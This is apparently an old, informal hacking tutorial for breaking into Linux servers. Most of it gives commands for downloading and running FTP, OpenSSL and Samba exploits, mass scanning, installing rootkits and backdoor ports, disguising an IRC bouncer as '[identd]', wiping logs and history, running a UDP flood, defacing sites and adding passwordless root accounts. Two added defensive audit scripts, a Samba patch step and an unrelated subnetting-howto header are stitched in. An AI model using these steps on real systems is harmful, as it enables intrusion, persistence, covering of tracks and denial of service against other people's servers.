Google hacking

======not trying to be clever, just fooling around======

First: open google.com
          allinurl:  cgi/file= .htm  <==< copy this into the Google search box


Local Exploit

Cracking Root
=======================================================

Tips:
mkdir .bash            <---- creates the .bash directory
cd .bash                 <--- enters the .bash directory

mkdir <directory>  <--- creates a new directory

cd <directory>       <--- enters the directory you want

cd /                        <--- leaves a directory

rm -rf  <file>          <--- deletes a file/directory


RootKit

First you need a shell, which you will use to scan for other shells/roots with this
scanner:
wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz 
After you download it, start scanning:
tar -xzvf wu2.tar.gz 
unpacking the archive
cd alpyftpd/ 
./scan 203 21 180 
203 - first IP class 
21 - it's necessary; it's the FTP port, the exploit is for FTP
180 - second IP class 
wew

rootkit: 
It's a backdoor which lets you connect to the server through another port and
password set by you. That makes you invisible; it hides screen, ps, w, last and all your
processes.
wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz 
tar -xzvf X.tar.gz 
unpacking the archive
cd X/ 
./install root password port e-mail 
root - it's necessary; it's the ID
password - sets the password you want for root
port - the port you connect through on ssh 
e-mail - your mail address, to receive the information about the server and your options
Example: 
./install root dexter 1402 dextervaneza@yahoo.com 
That means you connect to the server on port 1402 with ID root and password

ATTENTION ::.
For the xpost scanner,
see below:
wget http://www.cyberborneo.com/tools/xpost.tgz 
tar -zxvf xpost.tgz 
cd xpost 
cd xwurm 
./scan 200.152 
When the scan has finished, type
./masswu wu-scan.log 
And if another IP says SUCCESS, you HAVE ROOT ON THIS IP...
You must connect to it with awu; if you don't have awu, then get it:

wget www.geocities.com/blackhat12001/dimi.tgz 
tar -zxvf dimi.tgz 
cd awu 
./wu -a -d IP (or the box that said Success)

When it connects to the box,
type: 
cd /dev 
mkdir .p 
cd .p 
wget www.geocities.com/blackhat12001/r00tk1t.tgz 
tar -zxvf r00tk1t.tgz 
cd shv4 
./setup [password] [port] 
killer port: 53

remove log

198.26.132.121 80 <-- proxy
http://rpmfind.net
http://www.vip-hosting.com<---order Ds by qchex

install wget:
=====================
ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpm
rpm -ivh ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpms
another way:
ftp rpmfind.net
login : anonymous
pass : admin@
cd linux/redhat/6.2/en/os/i386/RedHat/RPMS/
get wget-1.5.3-6.i386.rpm
exit ftp: bye
rpm -ivh wget-1.5.3-6.i386.rpm
finish :)

install pico and remove.c
================================
ftp://rpmfind.net/linux/redhat/updates/9/en/os/i386/pine-4.44-19.90.0.i386.rpm <-- installs pico
ftp://rpmfind.net/linux/redhat/9/en/os/i386/RedHat/RPMS/pidentd-3.0.14-11.i386.rpm <--- ident
in the file under etc,
the default one
e.g.: remove what is not needed
remove what is not needed in identd.conf
ftp://dajal:p3l3rku@dajal.netfirms.com/www/rem  <--- remove.c (trace remover)

----------------------------------------------------------------------------------

psyBNC Installation

mkdir "...." <<-- this is our directory; after that we go into it
cd "...." <<-- enter the directory
wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh 
mv psybnc .log
cd .log
make  
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
type the command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] " 
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x shows the processes running in the background of the shell
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 Note: 2291 pts/1 S 0:00 [identd] <<-- this is your psybnc background process,
 renamed after the trick above. Don't celebrate too soon, though: the admin may become suspicious of the background processes on the server and look for it with:

find | grep psybnc <<-- a likely step, since admins usually know that users tend to run psybnc; the names of your psybnc files will then show up
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

So we need to rename those files to something else, for example:
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

This way the admin will probably not be suspicious of the background process on your server ;) and finally, don't forget to clean your logs by typing the commands:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Or you can also use the remove.c available on the k-elektronik site :)  good luck, and this is only
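
Detection side of the "[identd]" rename shown above, as an added example that is not part of the original post: a real kernel thread has no controlling terminal and is a child of kthreadd (PID 2), so a bracketed name on pts/1 gives itself away. The function names and the sample listing are constructed for illustration, and the parent check assumes Linux 2.6 or later.

```shell
#!/bin/sh
# Constructed sample, laid out like:  ps -e -o pid= -o ppid= -o tty= -o args=
sample_ps() {
cat <<'EOF'
    2     0 ?      [kthreadd]
   14     2 ?      [ksoftirqd/0]
 1890     1 ?      /usr/sbin/sshd
 2212  1890 pts/1  -bash
 2291  2212 pts/1  [identd]
 2305  2212 pts/1  [sh] <defunct>
 2400     1 ?      [kworker/0:1]
EOF
}

# Reads a listing in that layout on stdin and prints "PID REASON NAME"
# for every bracketed process name that cannot be a kernel thread.
find_fake_kthreads() {
    awk '
    $4 !~ /^\[/   { next }   # only names dressed up as kernel threads
    /<defunct>/   { next }   # ps also shows zombies in brackets
    $3 != "?"     { print $1, "HAS_TTY", $4; next }
    # kthreadd is PID 2; every other kernel thread is its child
    $1 + 0 != 2 && $2 + 0 != 2 { print $1, "PARENT_NOT_KTHREADD", $4 }
    '
}

sample_ps | find_fake_kthreads
```

On a live host, pipe the output of ps -e -o pid= -o ppid= -o tty= -o args= into the function. A flagged PID whose /proc/PID/exe link resolves to a file is a user-space program, because kernel threads have no executable.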

Tutorial on Using Exploits

Method I
1. wget http://www.renjana.com/xb.tar.gz 
2. tar -zxvf xb.tar.gz 
3. cd xb 
4. ./xbrute IP
----------------------------------------------------------------------------------
OpenSSL method:
*
   ./openssl-too-open -a 0x7 -v 
   ./openssl-too-open -a 0x10 -v
   ./openssl-too-open -a 0x14 -v 

./mapache 200 443 10 10
./apache target
----------------------------------------------------------------------------------
FTP method:
wget pembalap.us/ftp.tgz
tar
cd ftp
./scan ip1 port ip2 ip3
----------------------------------------------------------------------------------
Sambel :

http://www.packetstormsecurity.nl/0304-exploits/sambal.c
gcc -o sambal sambal.c
Scan :
./sambal -d 0 -C 60 -S 192.168.0

Fire:
./sambal -b 0 -v 192.168.0.133

If you get in:

http://utay-doyan.cc/shv4.tar.gz
tar 
cd
./setup medah 4500    <-- so you log in as root over ssh on port 4500
----------------------------------------------------------------------------------
PATCH

root@redeye samba]# /etc/init.d/smb stop
Shutting down SMB services: [ OK ]
Shutting down NMB services: [ OK ]
[root@redeye root]# cd /etc/samba
[root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
[root@redeye samba]# /etc/init.d/smb start
----------------------------------------------------------------------------------
Ddos attack :
wget http://packetstormsecurity.nl/DoS/udp.pl
perl udp.pl target 0 0
----------------------------------------------------------------------------------
Deface
cd /
cd var/www
go into html
just wget the index file there
chmod +x index
-------------------------------
echo <-- erase traces

go into the root directory
ls -al
echo <[namafile]
------------------------------------
Add a user as root:
1.
/usr/sbin/useradd pembalap -g wheel -s /bin/bash -d /etc/.pembalap
passwd -d pembalap

/usr/sbin/useradd jacky -g wheel -s /bin/bash -d /etc/.jacky
passwd -d jacky

2.
/usr/sbin/adduser pembalap -g root -d /home/pembalap -s /bin/bash
passwd -d pembalap

/usr/sbin/adduser ftp -g root -d /home/jacky -s /bin/bash
passwd -d ftp

/usr/sbin/useradd mailbin -c mail -d /var/spool/mail

**
/usr/sbin/useradd yiping -g root -u 0 -d / 
passwd -d yiping

/usr/sbin/useradd pir -g root -u 0 -d / 
passwd -d pir

/etc/httpd/conf/httpd.conf

/etc/init.d/httpd restart
ok

Del User
/usr/sbin/userdel
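
An audit for the account changes listed above, as an added example that is not part of the original post: it flags extra UID 0 accounts, password fields emptied by passwd -d, and home directories placed in hidden paths such as /etc/.pembalap. The function names, the finding codes and the passwd/shadow sample are constructed for illustration; the account names are the ones used on this page.

```shell
#!/bin/sh
# Writes a constructed passwd/shadow pair into directory $1.
make_sample() {
cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alice:x:500:500::/home/alice:/bin/bash
pembalap:x:501:10::/etc/.pembalap:/bin/bash
yiping:x:0:0::/:/bin/bash
EOF
cat > "$1/shadow" <<'EOF'
root:$1$CONSTRUCTED$notarealhash:12000:0:99999:7:::
daemon:*:12000:0:99999:7:::
alice:$1$CONSTRUCTED$notarealhash:12000:0:99999:7:::
pembalap::12345:0:99999:7:::
yiping::12345:0:99999:7:::
EOF
}

# audit_accounts PASSWD SHADOW
# Prints one "user FINDING" line per problem:
#   UID0        a second superuser (useradd ... -u 0)
#   EMPTYPW     empty shadow password field (result of passwd -d)
#   HIDDENHOME  home directory under a dot-directory
audit_accounts() {
    awk -F: '
    FNR == NR { pw[$1] = $2; next }        # first file read: shadow
    $3 + 0 == 0 && $1 != "root"  { print $1, "UID0" }
    ($1 in pw) && pw[$1] == ""   { print $1, "EMPTYPW" }
    $6 ~ /\/\./                  { print $1, "HIDDENHOME" }
    ' "$2" "$1"
}

d=$(mktemp -d)
make_sample "$d"
audit_accounts "$d/passwd" "$d/shadow"
rm -rf "$d"
```

Run as root against /etc/passwd and /etc/shadow; any output line is worth investigating, since none of these conditions occurs on a default install.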

IP Sub-Networking Mini-Howto


Robert Hart, hartr@interweft.com.au

v1.1, 30 August 2001


This document describes why and how to subnetwork an IP network – that is using a single A, B or C Class network number to function correctly on several interconnected networks.

